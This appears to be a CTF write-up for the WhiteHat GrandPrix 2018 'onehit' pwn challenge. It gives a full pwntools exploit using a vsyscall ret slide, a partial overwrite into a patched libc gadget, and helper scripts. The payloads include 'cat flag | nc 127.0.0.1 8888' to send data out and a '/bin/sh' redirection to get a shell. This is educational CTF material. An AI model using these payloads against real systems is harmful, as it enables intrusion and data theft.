WhiteHat GrandPrix 2018 QUAL - p

2018-08-26  2mpossible

A few days ago M4X handed me this challenge. I could not solve it at the time; after reading the writeup online I thought the technique was very neat.
wp: http://pwn3r.tistory.com/entry/WhiteHat-GrandPrix-2018-QUAL-pwn03-onehit

The supplied libc is 2.27, which does not load on Ubuntu 16.04:

(screenshot: ubuntu16.04)

So I worked on the challenge under Ubuntu 18.04 instead:

(screenshot: ubuntu18.04)

The neat part of this challenge is that the libc has been modified: an important trick is hidden inside it.

(screenshot)

Comparing it against a stock libc-2.27.so in 010editor shows where the two differ:

(screenshot: difference)
gef➤  x/3i 0x4f43a
   0x4f43a: add    rdi,0x7f
   0x4f43e: jmp    0x4f45b <system+27>
   0x4f440 <system>:    test   rdi,rdi
gef➤  x/10i 0x4f45b
   0x4f45b <system+27>: call   0x4eeb0 # do_system
   0x4f460 <system+32>: test   eax,eax
   0x4f462 <system+34>: sete   al
   0x4f465 <system+37>: add    rsp,0x8
   0x4f469 <system+41>: movzx  eax,al
   0x4f46c <system+44>: ret    
   0x4f46d: nop    DWORD PTR [rax]
   0x4f470 <realpath>:  push   rbp
   0x4f471 <realpath+1>:    mov    rbp,rsp
   0x4f474 <realpath+4>:    push   r15

The six patched bytes sit in the padding just before system: they add 0x7f to rdi and then jump to system+27, which is the call to do_system. So if we can return to libc+0x4f43a with rdi pointing 0x7f bytes before a command string, do_system runs that command for us (here: cat flag), without ever going through system's own prologue.
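To locate a patch like this without eyeballing it in 010editor, here is an added Python 3 script (mine, not part of the original writeup or of the challenge files) that byte-diffs two same-size libc images and decodes the injected add rdi, imm8 ; jmp rel8 pair. The two images it runs on are constructed stand-ins rather than the real files: the bytes under the patch in the genuine libc are alignment padding, represented here by NOPs; the offsets 0x4f43a and 0x4f440 are the ones from the gef output above.

```python
import struct

SYSTEM = 0x4f440   # offset of system() in the challenge libc (from the gef output)
GADGET = 0x4f43a   # where the injected instructions start


def find_patches(original, modified, merge_gap=4):
    """Return [(offset, old_bytes, new_bytes)] for each run of differing bytes.
    Differences closer together than merge_gap bytes are merged into one region,
    so a multi-instruction patch shows up once (like 010editor's compare view)."""
    if len(original) != len(modified):
        raise ValueError("images differ in size; this is a byte-for-byte compare")
    regions, start, last = [], None, None
    for i, (a, b) in enumerate(zip(original, modified)):
        if a != b:
            if start is None:
                start = i
            last = i
        elif start is not None and i - last > merge_gap:
            regions.append((start, last + 1))
            start = None
    if start is not None:
        regions.append((start, last + 1))
    return [(s, bytes(original[s:e]), bytes(modified[s:e])) for s, e in regions]


def decode_rdi_gadget(code, addr):
    """Recognise 'add rdi, imm8 ; jmp rel8' and return (imm8, jmp_target), else None.
    48 83 c7 ib : REX.W add r/m64, imm8 with modrm 0xc7 selecting rdi
    eb cb       : short jmp, displacement relative to the end of the instruction"""
    if len(code) < 6 or code[:3] != b"\x48\x83\xc7" or code[4] != 0xeb:
        return None
    imm = struct.unpack("b", code[3:4])[0]
    rel = struct.unpack("b", code[5:6])[0]
    return imm, addr + 6 + rel


def describe(original, modified):
    """Diff two libc images and decode every patch that looks like the rdi gadget.
    Returns [(offset, old_bytes, new_bytes, imm8, jmp_target)]."""
    out = []
    for off, old, new in find_patches(original, modified):
        dec = decode_rdi_gadget(new, off)
        if dec:
            out.append((off, old, new, dec[0], dec[1]))
    return out


# Constructed sample images (NOT the real files): 0x50000 zero bytes with the
# six bytes at GADGET replaced. In the real libc this spot is alignment padding
# before system(); NOPs stand in for it here.
_orig = bytearray(0x50000)
_orig[GADGET:GADGET + 6] = b"\x90" * 6
_patched = bytearray(_orig)
_patched[GADGET:GADGET + 6] = b"\x48\x83\xc7\x7f\xeb\x1b"  # add rdi,0x7f ; jmp system+27

SAMPLE_ORIGINAL = bytes(_orig)
SAMPLE_PATCHED = bytes(_patched)

if __name__ == "__main__":
    for off, old, new, imm, target in describe(SAMPLE_ORIGINAL, SAMPLE_PATCHED):
        print("patch at %#x: %s -> %s" % (off, old.hex(), new.hex()))
        print("  add rdi, %#x ; jmp %#x (system+%d)" % (imm, target, target - SYSTEM))
```

Feed it the real pair with open("libc-2.27.so","rb").read() for both arguments; anything that is not the rdi gadget is still reported by find_patches, it just is not decoded.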

main antiSPAM

The proof-of-work is a routine hash brute force:

# antiSPAM proof-of-work: the server prints  sha512("<head><number>") = 0x<prefix>...
p.recvuntil("sha512(\"")
head = p.recvuntil("\"", drop = True)
p.recvuntil(") = 0x")
check = p.recvuntil("...", drop = True)
interger = 0
# brute-force the number (Python 2, so str concatenation works directly on raw bytes)
for i in range(0, 0x1fffff)[::-1]:
    if sha512(head + str(i)).hexdigest().startswith(check):
        print i
        interger = i
        break
p.recvuntil('interger = ')
p.send(str(interger).ljust(0x100,'\x11')) # pad with 0x11 bytes so the uninitialised v2 in echo() becomes huge and the later read overflows the stack
echo

Because v2 is never initialized, the 0x11 padding from the previous step makes it very large, and the read overflows the stack buffer. The binary does have a stack canary, but look closely at the assembly:

(screenshot)

__stack_chk_fail is effectively a no-op here, so the canary check never stops us.

The other ingredient is a ret slide in vsyscall. The vsyscall page lives at a fixed address (it is not randomised) and every entry ends in ret, so returning into 0xffffffffff600400 over and over walks rsp up the stack one slot at a time until it reaches the slot we actually want to return through. Note that this only works because 0xffffffffff600400 is the exact start of the time entry: with the default vsyscall=emulate the kernel only accepts calls that land on an entry point, and with vsyscall=none the page is not mapped at all.

gef➤  x/5i 0xffffffffff600400
   0xffffffffff600400:  mov    rax,0xc9
   0xffffffffff600407:  syscall 
   0xffffffffff600409:  ret 

Before the overflow

gef➤  telescope $rsp 60
0x00007fff97da6a30│+0x00: 0x1111111111111111     ← $rsp
0x00007fff97da6a38│+0x08: 0x1111113111111111
0x00007fff97da6a40│+0x10: 0x1164616f6c796170     ← $rsi
0x00007fff97da6a48│+0x18: 0x00004f2d00000000
0x00007fff97da6a50│+0x20: 0x00007f27b1188360  →   push rbx
0x00007fff97da6a58│+0x28: 0x00007fff97da6a4c  →  0xb118836000004f2d ("-O"?)
0x00007fff97da6a60│+0x30: 0x1111111111111111
0x00007fff97da6a68│+0x38: 0x00007f27b11c41bd  →  <_IO_file_write+45> test rax, rax
0x00007fff97da6a70│+0x40: 0x1111111111111111
0x00007fff97da6a78│+0x48: 0x00007f27b1525760  →  0x00000000fbad2887
0x00007fff97da6a80│+0x50: 0x0000000000000d68 ("h"?)
0x00007fff97da6a88│+0x58: 0x0000000000000001
0x00007fff97da6a90│+0x60: 0x00007f27b15257e3  →  0x5268c0000000000a
0x00007fff97da6a98│+0x68: 0x00007f27b11c5f51  →  <_IO_do_write+177> mov rbp, rax
0x00007fff97da6aa0│+0x70: 0x000055986bed2248  →  "Only Echo is available"
0x00007fff97da6aa8│+0x78: 0x00007f27b1525760  →  0x00000000fbad2887
0x00007fff97da6ab0│+0x80: 0x000000000000000a
0x00007fff97da6ab8│+0x88: 0x000055986bed2248  →  "Only Echo is available"
0x00007fff97da6ac0│+0x90: 0x00007f27b15212a0  →  0x0000000000000000
0x00007fff97da6ac8│+0x98: 0x0000000000000000
0x00007fff97da6ad0│+0xa0: 0x0000000000000000
0x00007fff97da6ad8│+0xa8: 0x00007f27b11c6403  →  <_IO_file_overflow+259> cmp eax, 0xffffffff
0x00007fff97da6ae0│+0xb0: 0x0000000000000016
0x00007fff97da6ae8│+0xb8: 0x00007f27b1525760  →  0x00000000fbad2887
0x00007fff97da6af0│+0xc0: 0x000055986bed2248  →  "Only Echo is available"
0x00007fff97da6af8│+0xc8: 0x00007f27b11b9b62  →  <puts+418> cmp eax, 0xffffffff
0x00007fff97da6b00│+0xd0: "PLOUTZTJ"
0x00007fff97da6b08│+0xd8: 0x0000000000000000
0x00007fff97da6b10│+0xe0: 0x00007fff97da6c00  →  0x00007fff97da6c10  →  0x000055986bed2060  →   push r15
0x00007fff97da6b18│+0xe8: 0x3595ebe7a90fd900
0x00007fff97da6b20│+0xf0: 0x00007fff97da6c00  →  0x00007fff97da6c10  →  0x000055986bed2060  →   push r15     ← $rbp
0x00007fff97da6b28│+0xf8: 0x000055986bed1f69  →   nop 
0x00007fff97da6b30│+0x100: 0x0000000000000031 ("1"?)
0x00007fff97da6b38│+0x108: 0x0000000000000000
0x00007fff97da6b40│+0x110: 0x0000000000000000
0x00007fff97da6b48│+0x118: 0x0000000000000000
0x00007fff97da6b50│+0x120: 0x0000000000000000
0x00007fff97da6b58│+0x128: 0x0000000000000000
0x00007fff97da6b60│+0x130: 0x0000000000000000
0x00007fff97da6b68│+0x138: 0x0000000000000000
0x00007fff97da6b70│+0x140: 0x0000000000000000
0x00007fff97da6b78│+0x148: 0x0000000000000000
0x00007fff97da6b80│+0x150: 0x0000000000000000
0x00007fff97da6b88│+0x158: 0x0000000000000000
0x00007fff97da6b90│+0x160: 0x0000000000000000
0x00007fff97da6b98│+0x168: 0x00007f2700000000
0x00007fff97da6ba0│+0x170: 0x000055986bed2268  →  "Echo machine: Would you like to ls -al?"
0x00007fff97da6ba8│+0x178: 0x3595ebe7a90fd900
0x00007fff97da6bb0│+0x180: 0x0000000000000000
0x00007fff97da6bb8│+0x188: 0x00007fff97da6c00  →  0x00007fff97da6c10  →  0x000055986bed2060  →   push r15
0x00007fff97da6bc0│+0x190: 0x000055986bed1b50  →   xor ebp, ebp
0x00007fff97da6bc8│+0x198: 0x00007f27b1188460  →  <system+32> test eax, eax
0x00007fff97da6bd0│+0x1a0: 0x00007fff97da6cf0  →  0x0000000000000001
0x00007fff97da6bd8│+0x1a8: 0x000055986bed1fef  →   nop

After the overflow

gef➤  telescope $rsp 60
0x00007ffd8cf98690│+0x00: 0x1111111111111111     ← $rsp
0x00007ffd8cf98698│+0x08: 0x1111113111111111
0x00007ffd8cf986a0│+0x10: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"  ← $rsi
0x00007ffd8cf986a8│+0x18: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986b0│+0x20: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986b8│+0x28: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986c0│+0x30: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986c8│+0x38: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986d0│+0x40: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986d8│+0x48: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986e0│+0x50: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986e8│+0x58: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986f0│+0x60: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986f8│+0x68: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf98700│+0x70: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaacat[...]"
0x00007ffd8cf98708│+0x78: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaacat flag | [...]"
0x00007ffd8cf98710│+0x80: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaacat flag | nc 127.0[...]"
0x00007ffd8cf98718│+0x88: "aaaaaaaaaaaaaaaaaaaaaaacat flag | nc 127.0.0.1 888[...]"
0x00007ffd8cf98720│+0x90: "aaaaaaaaaaaaaaacat flag | nc 127.0.0.1 8888"
0x00007ffd8cf98728│+0x98: "aaaaaaacat flag | nc 127.0.0.1 8888"
0x00007ffd8cf98730│+0xa0: "at flag | nc 127.0.0.1 8888"
0x00007ffd8cf98738│+0xa8: "| nc 127.0.0.1 8888"
0x00007ffd8cf98740│+0xb0: ".0.0.1 8888"
0x00007ffd8cf98748│+0xb8: 0x6161616100383838 ("888"?)
0x00007ffd8cf98750│+0xc0: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf98758│+0xc8: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0x00007ffd8cf98760│+0xd0: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0x00007ffd8cf98768│+0xd8: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0x00007ffd8cf98770│+0xe0: "aaaaaaaaaaaaaaaaaaaaaaaa"
0x00007ffd8cf98778│+0xe8: "aaaaaaaaaaaaaaaa"
0x00007ffd8cf98780│+0xf0: "aaaaaaaa"     ← $rbp
0x00007ffd8cf98788│+0xf8: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf98790│+0x100: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf98798│+0x108: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf987a0│+0x110: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf987a8│+0x118: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf987b0│+0x120: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf987b8│+0x128: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf987c0│+0x130: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf987c8│+0x138: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf987d0│+0x140: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf987d8│+0x148: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf987e0│+0x150: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf987e8│+0x158: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf987f0│+0x160: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf987f8│+0x168: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf98800│+0x170: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf98808│+0x178: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf98810│+0x180: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf98818│+0x188: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf98820│+0x190: 0xffffffffff600400  →  0x0f000000c9c0c748
0x00007ffd8cf98828│+0x198: 0x00007ffa0aa5e43a  →   add rdi, 0x7f
0x00007ffd8cf98830│+0x1a0: 0x00007ffd8cf98950  →  0x0000000000000001
0x00007ffd8cf98838│+0x1a8: 0x000055bf30acbfef  →   nop
Compare +0x198 in the two dumps: before the overflow it holds <system+32>, the return address that an earlier call into system left behind on the stack. The slide runs from echo's saved return address (+0xf8) up to +0x190, and the final byte of the payload, 0x3a, overwrites only the low byte of that stale pointer, turning 0x...8460 into 0x...843a, i.e. libc+0x4f43a. No libc leak is needed because system+32 (0x4f460) and the gadget (0x4f43a) share all but the lowest byte. At the ret, system is called successfully:

(screenshot)
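As an added illustration (my own Python 3 code, not the author's exploit), the payload builder below reproduces the layout from the two dumps and then walks the frame the way the CPU does at echo's ret: each vsyscall entry consumes one slot, and the last slot is the stale <system+32> pointer with its low byte replaced. The offsets are taken from the dumps above (saved return address at buffer+0xe8, stale pointer at buffer+0x188); the assumption that rdi points 0x10 bytes into the buffer when the gadget runs is inferred from the exploit's 'a'*(0x7f+0x10) padding and is not verified separately. The libc base used in the usage is computed from the <system+32> value in the first dump.

```python
import struct

VSYSCALL_TIME = 0xffffffffff600400  # vsyscall 'time': mov rax,0xc9 ; syscall ; ret
GADGET_OFF = 0x4f43a                # patched bytes: add rdi,0x7f ; jmp system+27
SYSTEM_OFF = 0x4f440
RDI_ADJUST = 0x7f                   # what the gadget adds to rdi
RDI_OFF = 0x10                      # ASSUMPTION: rdi = buffer+0x10 at the ret (from the exploit's padding)
RET_SLOT = 0xe8                     # buffer offset of echo()'s saved return address
STALE_SLOT = 0x188                  # buffer offset of the stale <system+32> value (rsp+0x198)


def partial_overwrite_possible(from_off, to_off):
    """A one-byte overwrite can only retarget a pointer if the two libc offsets
    agree in everything above the lowest byte."""
    return (from_off >> 8) == (to_off >> 8)


def build_payload(cmd, rdi_off=RDI_OFF):
    """Same layout as the exploit: command at rdi+0x7f, pad to the return slot,
    vsyscall ret slide up to the stale pointer, then one byte to redirect it."""
    if isinstance(cmd, str):
        cmd = cmd.encode()
    payload = b"a" * (rdi_off + RDI_ADJUST) + cmd + b"\x00"
    if len(payload) > RET_SLOT:
        raise ValueError("command too long for the frame")
    payload = payload.ljust(RET_SLOT, b"a")
    n_slide = (STALE_SLOT - RET_SLOT) // 8          # 20 entries
    payload += struct.pack("<Q", VSYSCALL_TIME) * n_slide
    payload += bytes([GADGET_OFF & 0xff])           # 0x3a: low byte of the gadget
    return payload


def simulate_ret(payload, stale_value):
    """Model the stack from the buffer base up to the stale slot at the moment of
    echo()'s ret. The slot holds the real libc value (system+32) before the
    overflow; the payload is then written over the top. Returns (final target,
    number of vsyscall rets taken, the string the gadget will pass to do_system)."""
    frame = bytearray(STALE_SLOT + 8)
    frame[STALE_SLOT:STALE_SLOT + 8] = struct.pack("<Q", stale_value)
    if len(payload) > len(frame):
        raise ValueError("payload runs past the modelled frame")
    frame[:len(payload)] = payload
    rsp, steps = RET_SLOT, 0
    while True:
        target = struct.unpack("<Q", frame[rsp:rsp + 8])[0]
        rsp += 8
        if target != VSYSCALL_TIME:
            break
        steps += 1  # vsyscall time() ran and returned; rsp moved up one slot
    cmd = bytes(frame[RDI_OFF + RDI_ADJUST:]).split(b"\x00")[0]
    return target, steps, cmd


if __name__ == "__main__":
    libc_base = 0x00007f27b1188460 - (SYSTEM_OFF + 32)   # from <system+32> in the first dump
    pl = build_payload("cat flag | nc 127.0.0.1 8888")
    rip, steps, cmd = simulate_ret(pl, libc_base + SYSTEM_OFF + 32)
    print("payload %d bytes, %d vsyscall rets, lands at %#x (libc+%#x), runs %r"
          % (len(pl), steps, rip, rip - libc_base, cmd))
```

Changing STALE_SLOT or RET_SLOT shows why the exact slot count matters: one entry too few and the ret lands on a 0xa slide word that is no longer there, one too many and it skips past the redirected pointer.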

Because the program has closed its stdin and stdout, the command's output cannot come back over the connection. Instead, listen on a port and let the command push the flag out through nc:

cat flag | nc 127.0.0.1 8888\x00

(screenshot: cat flag)

Alternatively, the command from the writeup,

/bin/sh <&2 >&2 ;

gives a shell: it points the shell's stdin and stdout at stderr, which the program left open.
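For the nc route, the listener side is the part the exploit does not show. This added Python 3 snippet (mine, not from the writeup) is a minimal stand-in for nc -l: it builds the command string for a chosen port, accepts one connection and keeps whatever arrives. push() mimics what nc does on the target; the flag it sends in the usage is a constructed value.

```python
import socket
import threading


def exfil_command(port, host="127.0.0.1", path="flag"):
    """The string handed to do_system(): the process's own stdout is closed, so
    the command pushes the flag to our listener instead of printing it."""
    return "cat %s | nc %s %d" % (path, host, port)


class FlagListener:
    """Bind, accept a single connection in the background and collect its bytes.
    port=0 lets the kernel pick a free port, which is convenient for testing."""

    def __init__(self, host="127.0.0.1", port=8888):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(1)
        self.host, self.port = self.sock.getsockname()[:2]
        self.data = b""
        self._thread = threading.Thread(target=self._serve, daemon=True)
        self._thread.start()

    def _serve(self):
        conn, _ = self.sock.accept()
        with conn:
            while True:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                self.data += chunk
        self.sock.close()

    def wait(self, timeout=10.0):
        """Block until the sender closes the connection (or timeout) and return the bytes."""
        self._thread.join(timeout)
        return self.data


def push(port, data, host="127.0.0.1"):
    """What 'cat flag | nc host port' does on the target side: connect, write, close."""
    with socket.create_connection((host, port)) as s:
        s.sendall(data)


if __name__ == "__main__":
    listener = FlagListener(port=8888)
    print("send this through the overflow:", exfil_command(listener.port))
    push(listener.port, b"WhiteHat{constructed_flag_for_the_demo}\n")  # stand-in for the target
    print("received:", listener.wait().decode(errors="replace"))
```

On a remote target the listener has to be reachable from the challenge box, so host would be your own address rather than 127.0.0.1; the loopback address in the writeup works because the author ran everything locally.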

完整exp:

from pwn import *
from hashlib import sha512
context.log_level = 'debug'

# Python 2 / pwntools exploit; the modified libc is forced in with LD_PRELOAD
p = process("./onehit.",env = {"LD_PRELOAD" : './libc-2.27.so'})

# antiSPAM: brute-force the number whose sha512(head + number) starts with the shown prefix
p.recvuntil("sha512(\"")
head = p.recvuntil("\"", drop = True)
p.recvuntil(") = 0x")
check = p.recvuntil("...", drop = True)
interger = 0
for i in range(0, 0x1fffff)[::-1]:
    if sha512(head + str(i)).hexdigest().startswith(check):
        print i
        interger = i
        break
p.recvuntil('interger = ')
# pad with 0x11 bytes so the uninitialised v2 in echo() becomes huge
p.send(str(interger).ljust(0x100,'\x11'))
#gdb.attach(p)
p.recvuntil('ls -al?\n')
p.send('N0\x00')

p.recvuntil('/bin/sh\n')
p.send('1')
#gdb.attach(p)   # uncomment to inspect the frame right before the overflow
p.recvuntil('available\n')
# echo: rdi + 0x7f must point at the command string when the gadget runs
payload = 'a'*(0x7f+0x10)
payload += 'cat flag | nc 127.0.0.1 8888\x00' #cat flag
#payload += '/bin/sh <&2 >&2 ;' #get shell
payload = payload.ljust(0xe8,'a')        # fill up to echo's saved return address
payload += p64(0xffffffffff600400)*20    # vsyscall ret slide up to the stale <system+32>
payload += '\x3a'                        # low byte only: system+32 (..60) -> gadget (..3a)
p.send(payload)

p.interactive()